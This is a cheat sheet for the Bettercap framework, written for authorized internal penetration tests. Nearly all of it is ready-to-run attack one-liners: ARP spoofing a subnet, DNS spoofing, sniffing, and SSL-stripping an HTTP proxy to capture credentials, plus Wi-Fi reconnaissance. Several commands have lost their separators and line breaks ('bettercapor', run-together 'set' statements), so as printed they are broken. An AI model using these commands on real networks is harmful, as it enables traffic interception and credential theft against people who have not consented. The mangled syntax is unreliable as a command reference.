Bettercap Cheat Sheet
Modern network attack and monitoring framework for ARP/DNS spoofing, sniffing, and credential attacks on authorized LANs.
Overview
Bettercap replaces many Ettercap/Wireshark workflows with a scriptable REPL for LAN MITM, probing, and Wi-Fi (where hardware and scope allow) on authorized internal assessments.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y bettercapor
sudo snap install bettercapEssential commands
Interactive session
sudo bettercap -iface eth0Eval one-liner
sudo bettercap -iface eth0 -eval "net.probe on; net.show"Common workflows
ARP spoof subnet —
sudo bettercap -iface eth0 -eval "set arp.spoof.targets 10.10.10.100set arp.spoof.fullduplex truearp.spoof onnet.sniff on"net.sniff on
sudo bettercap -iface eth0 -caplet arp-spoof.capletDNS spoof —
sudo bettercap -iface eth0 -eval "set dns.spoof.domains target.localset dns.spoof.address 10.10.14.5dns.spoof on"Probe and enumerate hosts —
sudo bettercap -iface eth0 -eval "net.probe on; sleep 10; net.show; net.ls"HTTP proxy + HSTS (authorized cred testing) —
sudo bettercap -iface eth0 -eval "set http.proxy.sslstrip truehttp.proxy onarp.spoof on"Wi-Fi recon (only if wireless testing is in scope) —
sudo bettercap -iface wlan0 -eval "wifi.recon on; wifi.show"Flags reference
-iface | Network interface |
|---|---|
-eval CMD | Run commands and exit |
-caplet FILE | Run caplet script |
net.probe | Active host discovery |
net.show | Show hosts |
arp.spoof on | ARP poisoning |
net.sniff on | Sniff traffic |
dns.spoof on | DNS spoofing |
http.proxy on | HTTP(S) proxy |
set var val | Configuration |
help | Module help |
Tips
- Use net.probe before spoofing to confirm live targets.
- Caplets automate repeatable internal lab setups.
- Combine with tcpdump on same interface for PCAP evidence.
- Wireless attacks require compatible adapter, monitor mode, and explicit scope.